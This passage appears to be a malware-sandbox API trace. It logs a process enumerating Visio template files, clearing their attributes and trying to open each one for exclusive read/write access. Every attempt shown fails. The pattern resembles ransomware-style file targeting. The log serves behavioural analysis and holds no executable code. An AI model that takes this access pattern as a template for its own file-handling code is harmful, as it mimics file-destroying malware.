(normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bordrs_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.882] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.882] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.882] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.882] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.882] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNA_M.VSS", dwFileAttributes=0x80) returned 0 [0137.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNA_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpmna_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.883] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.883] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.883] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.883] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.883] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNA_U.VSS", dwFileAttributes=0x80) returned 0 [0137.883] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNA_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpmna_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.884] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.884] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.884] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.884] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.884] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNC_M.VSS", dwFileAttributes=0x80) returned 0 [0137.884] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNC_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpmnc_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.884] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.884] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.884] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.884] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.885] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNC_U.VSS", dwFileAttributes=0x80) returned 0 [0137.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNC_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpmnc_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.885] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.885] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.885] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.885] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.885] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNE_M.VSS", dwFileAttributes=0x80) returned 0 [0137.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNE_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpmne_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.885] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.885] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.885] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.886] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.886] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNE_U.VSS", dwFileAttributes=0x80) returned 0 [0137.886] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNE_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpmne_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.886] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.886] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.887] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.887] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNG_M.VSS", dwFileAttributes=0x80) returned 0 [0137.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNG_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpmng_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.887] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.887] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.887] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.887] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.887] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNG_U.VSS", dwFileAttributes=0x80) returned 0 [0137.887] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMNG_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpmng_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.888] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.888] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.888] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.888] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.888] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMN_M.VSS", dwFileAttributes=0x80) returned 0 [0137.888] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMN_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpmn_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.888] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.888] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.888] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.888] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.888] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMN_M.VST", dwFileAttributes=0x80) returned 0 [0137.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMN_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpmn_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.889] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.889] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.889] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.889] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.889] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMN_U.VSS", dwFileAttributes=0x80) returned 0 [0137.889] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMN_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpmn_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.889] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.889] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.889] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.889] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.890] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMN_U.VST", dwFileAttributes=0x80) returned 0 [0137.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPMN_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpmn_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.890] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.890] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.890] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.890] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.890] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPRES_M.VSS", dwFileAttributes=0x80) returned 0 [0137.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPRES_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpres_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.890] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.890] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.891] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.891] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPRES_U.VSS", dwFileAttributes=0x80) returned 0 [0137.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BPRES_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bpres_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.891] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.891] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.891] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.891] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.891] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BRAINSTM.XML", dwFileAttributes=0x80) returned 0 [0137.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BRAINSTM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\brainstm.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.892] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.892] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.892] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.892] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.892] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BSTORM_M.VSS", dwFileAttributes=0x80) returned 0 [0137.892] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BSTORM_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bstorm_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.892] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.892] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.892] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.892] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.892] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BSTORM_M.VST", dwFileAttributes=0x80) returned 0 [0137.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BSTORM_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bstorm_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.893] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.893] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.893] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.894] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.895] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BSTORM_U.VSS", dwFileAttributes=0x80) returned 0 [0137.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BSTORM_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bstorm_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.895] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.895] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.895] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.895] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.895] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BSTORM_U.VST", dwFileAttributes=0x80) returned 0 [0137.895] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BSTORM_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bstorm_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.895] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.895] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.896] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.896] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.896] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BTHKT_M.VSS", dwFileAttributes=0x80) returned 0 [0137.896] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BTHKT_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bthkt_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.896] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.897] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.897] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.897] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BTHKT_U.VSS", dwFileAttributes=0x80) returned 0 [0137.897] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\BTHKT_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\bthkt_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.897] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.897] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.897] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.897] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.897] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CABNT_M.VSS", dwFileAttributes=0x80) returned 0 [0137.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CABNT_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\cabnt_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.898] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.898] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.898] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.898] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.898] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CABNT_U.VSS", dwFileAttributes=0x80) returned 0 [0137.898] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CABNT_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\cabnt_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.898] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.898] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.898] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.898] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.899] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CALNDR_M.VSS", dwFileAttributes=0x80) returned 0 [0137.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CALNDR_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\calndr_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.899] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.899] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.899] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.899] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.899] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CALNDR_M.VST", dwFileAttributes=0x80) returned 0 [0137.899] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CALNDR_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\calndr_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.899] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.899] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.900] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.900] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.900] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CALNDR_U.VSS", dwFileAttributes=0x80) returned 0 [0137.900] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CALNDR_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\calndr_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.900] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.900] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.900] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.900] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.900] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CALNDR_U.VST", dwFileAttributes=0x80) returned 0 [0137.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CALNDR_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\calndr_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.901] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.901] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.901] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.901] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CALOUT_M.VSS", dwFileAttributes=0x80) returned 0 [0137.903] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CALOUT_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\calout_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.903] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.903] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.903] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.903] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.903] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CALOUT_U.VSS", dwFileAttributes=0x80) returned 0 [0137.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\CALOUT_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\calout_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 